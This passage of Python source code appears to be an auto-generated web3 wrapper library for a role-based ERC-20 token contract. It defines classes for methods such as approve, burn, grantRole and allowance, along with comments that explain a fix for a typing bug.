    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider to route requests through
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for PAUSER_ROLE
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the value as returned by web3 (annotated bytes or str).
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generated code did `return Union[bytes, str](returned)`.
        # typing.Union is a special form and is not callable, so that line
        # raised `TypeError: Cannot instantiate typing.Union` on every call.
        # The web3 return value already satisfies the annotation; pass it through.
        return returned

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        :returns: the transaction hash.
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class TransferRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the TRANSFER_ROLE method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider to route requests through
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for TRANSFER_ROLE
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the value as returned by web3 (annotated bytes or str).
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generated code did `return Union[bytes, str](returned)`.
        # typing.Union is a special form and is not callable, so that line
        # raised `TypeError: Cannot instantiate typing.Union` on every call.
        # The web3 return value already satisfies the annotation; pass it through.
        return returned

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        :returns: the transaction hash.
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractUri_Method(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the _contractURI method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Store the provider, target address and bound contract function."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Read the method's value via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class AllowanceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the allowance method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Store the provider, target address, bound function and validator."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, owner: str, spender: str):
        """Run the configured validator over each address and checksum it."""
        self.validator.assert_valid(
            method_name='allowance',
            parameter_name='owner',
            argument_value=owner,
        )
        owner = self.validate_and_checksum_address(owner)
        self.validator.assert_valid(
            method_name='allowance',
            parameter_name='spender',
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        return owner, spender

    def call(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> int:
        """Query the current allowance via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        owner, spender = self.validate_and_normalize_inputs(owner, spender)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(owner, spender).call(params))

    def send_transaction(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        owner, spender = self.validate_and_normalize_inputs(owner, spender)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner, spender).transact(params)

    def build_transaction(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        owner, spender = self.validate_and_normalize_inputs(owner, spender)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner, spender).buildTransaction(params)

    def estimate_gas(self, owner: str, spender: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        owner, spender = self.validate_and_normalize_inputs(owner, spender)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner, spender).estimateGas(params)
class ApproveMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the approve method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Store the provider, target address, bound function and validator."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, spender: str, amount: int):
        """Validate both arguments; checksum the address, coerce the amount."""
        self.validator.assert_valid(
            method_name='approve',
            parameter_name='spender',
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name='approve',
            parameter_name='amount',
            argument_value=amount,
        )
        # Coerce to int so fractional inputs cannot slip through.
        amount = int(amount)
        return spender, amount

    def call(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> bool:
        """Simulate the approval via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        spender, amount = self.validate_and_normalize_inputs(spender, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(spender, amount).call(params))

    def send_transaction(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        spender, amount = self.validate_and_normalize_inputs(spender, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, amount).transact(params)

    def build_transaction(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        spender, amount = self.validate_and_normalize_inputs(spender, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, amount).buildTransaction(params)

    def estimate_gas(self, spender: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        spender, amount = self.validate_and_normalize_inputs(spender, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, amount).estimateGas(params)
class BalanceOfMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the balanceOf method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Store the provider, target address, bound function and validator."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str):
        """Validate the account argument and return its checksummed form."""
        self.validator.assert_valid(
            method_name='balanceOf',
            parameter_name='account',
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        return account

    def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
        """Query the balance via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(account).call(params))

    def send_transaction(self, account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).transact(params)

    def build_transaction(self, account: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).buildTransaction(params)

    def estimate_gas(self, account: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).estimateGas(params)
class BurnMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the burn method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Store the provider, target address, bound function and validator."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, amount: int):
        """Validate the amount and coerce it to a whole number."""
        self.validator.assert_valid(
            method_name='burn',
            parameter_name='amount',
            argument_value=amount,
        )
        # Coerce to int so fractional inputs cannot slip through.
        amount = int(amount)
        return amount

    def call(self, amount: int, tx_params: Optional[TxParams] = None) -> None:
        """Simulate the burn via eth_call; the method has no return value.

        :param tx_params: transaction parameters
        """
        amount = self.validate_and_normalize_inputs(amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(amount).call(params)

    def send_transaction(self, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        amount = self.validate_and_normalize_inputs(amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(amount).transact(params)

    def build_transaction(self, amount: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        amount = self.validate_and_normalize_inputs(amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(amount).buildTransaction(params)

    def estimate_gas(self, amount: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        amount = self.validate_and_normalize_inputs(amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(amount).estimateGas(params)
class BurnFromMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the burnFrom method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Store the provider, target address, bound function and validator."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str, amount: int):
        """Validate both arguments; checksum the address, coerce the amount."""
        self.validator.assert_valid(
            method_name='burnFrom',
            parameter_name='account',
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name='burnFrom',
            parameter_name='amount',
            argument_value=amount,
        )
        # Coerce to int so fractional inputs cannot slip through.
        amount = int(amount)
        return account, amount

    def call(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> None:
        """Simulate the burn via eth_call; the method has no return value.

        :param tx_params: transaction parameters
        """
        account, amount = self.validate_and_normalize_inputs(account, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(account, amount).call(params)

    def send_transaction(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account, amount = self.validate_and_normalize_inputs(account, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, amount).transact(params)

    def build_transaction(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        account, amount = self.validate_and_normalize_inputs(account, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, amount).buildTransaction(params)

    def estimate_gas(self, account: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        account, amount = self.validate_and_normalize_inputs(account, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, amount).estimateGas(params)
class ContractUriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractURI method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Store the provider, target address and bound contract function."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Read the method's value via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class DecimalsMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the decimals method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Store the provider, target address and bound contract function."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Read the method's value via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method().call(params))

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class DecreaseAllowanceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the decreaseAllowance method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Store the provider, target address, bound function and validator."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, spender: str, subtracted_value: int):
        """Validate both arguments; checksum the address, coerce the value."""
        self.validator.assert_valid(
            method_name='decreaseAllowance',
            parameter_name='spender',
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name='decreaseAllowance',
            parameter_name='subtractedValue',
            argument_value=subtracted_value,
        )
        # Coerce to int so fractional inputs cannot slip through.
        subtracted_value = int(subtracted_value)
        return spender, subtracted_value

    def call(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> bool:
        """Simulate the allowance decrease via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(
            self._underlying_method(spender, subtracted_value).call(params))

    def send_transaction(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Invoke the method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, subtracted_value).transact(params)

    def build_transaction(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(
            spender, subtracted_value).buildTransaction(params)

    def estimate_gas(self, spender: str, subtracted_value: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(
            spender, subtracted_value).estimateGas(params)
class GetRoleAdminMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleAdmin method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str]):
        """Validate the inputs to the getRoleAdmin method."""
        self.validator.assert_valid(
            method_name='getRoleAdmin',
            parameter_name='role',
            argument_value=role,
        )
        return (role)

    def call(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(role).call(tx_params.as_dict())
        # BUG FIX: the generated code did ``return Union[bytes, str](returned)``,
        # but typing.Union is not callable, so every successful eth_call raised
        # TypeError. Return the raw result (already bytes/str from web3) instead.
        return returned

    def send_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).transact(tx_params.as_dict())

    def build_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).buildTransaction(tx_params.as_dict())

    def estimate_gas(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoleMemberMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleMember method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str], index: int):
        """Validate the inputs to the getRoleMember method."""
        self.validator.assert_valid(
            method_name='getRoleMember', parameter_name='role', argument_value=role)
        self.validator.assert_valid(
            method_name='getRoleMember', parameter_name='index', argument_value=index)
        # int() safeguards against fractional inputs
        index = int(index)
        return (role, index)

    def call(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method(role, index).call(params)
        return str(raw)

    def send_transaction(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, index).transact(params)

    def build_transaction(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, index).buildTransaction(params)

    def estimate_gas(self, role: Union[bytes, str], index: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, index).estimateGas(params)
class GetRoleMemberCountMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleMemberCount method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str]):
        """Validate the inputs to the getRoleMemberCount method."""
        self.validator.assert_valid(
            method_name='getRoleMemberCount', parameter_name='role', argument_value=role)
        return role

    def call(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method(role).call(params)
        return int(raw)

    def send_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role).transact(params)

    def build_transaction(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role).buildTransaction(params)

    def estimate_gas(self, role: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role).estimateGas(params)
class GrantRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the grantRole method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
        """Validate the inputs to the grantRole method."""
        self.validator.assert_valid(
            method_name='grantRole', parameter_name='role', argument_value=role)
        self.validator.assert_valid(
            method_name='grantRole', parameter_name='account', argument_value=account)
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(role, account).call(params)

    def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class HasRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the hasRole method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
        """Validate the inputs to the hasRole method."""
        self.validator.assert_valid(
            method_name='hasRole', parameter_name='role', argument_value=role)
        self.validator.assert_valid(
            method_name='hasRole', parameter_name='account', argument_value=account)
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method(role, account).call(params)
        return bool(raw)

    def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class IncreaseAllowanceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the increaseAllowance method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, spender: str, added_value: int):
        """Validate the inputs to the increaseAllowance method."""
        self.validator.assert_valid(
            method_name='increaseAllowance', parameter_name='spender', argument_value=spender)
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name='increaseAllowance', parameter_name='addedValue', argument_value=added_value)
        # int() safeguards against fractional inputs
        added_value = int(added_value)
        return (spender, added_value)

    def call(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method(spender, added_value).call(params)
        return bool(raw)

    def send_transaction(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, added_value).transact(params)

    def build_transaction(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, added_value).buildTransaction(params)

    def estimate_gas(self, spender: str, added_value: int, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, added_value).estimateGas(params)
class IsRestrictedTransferMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the isRestrictedTransfer method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
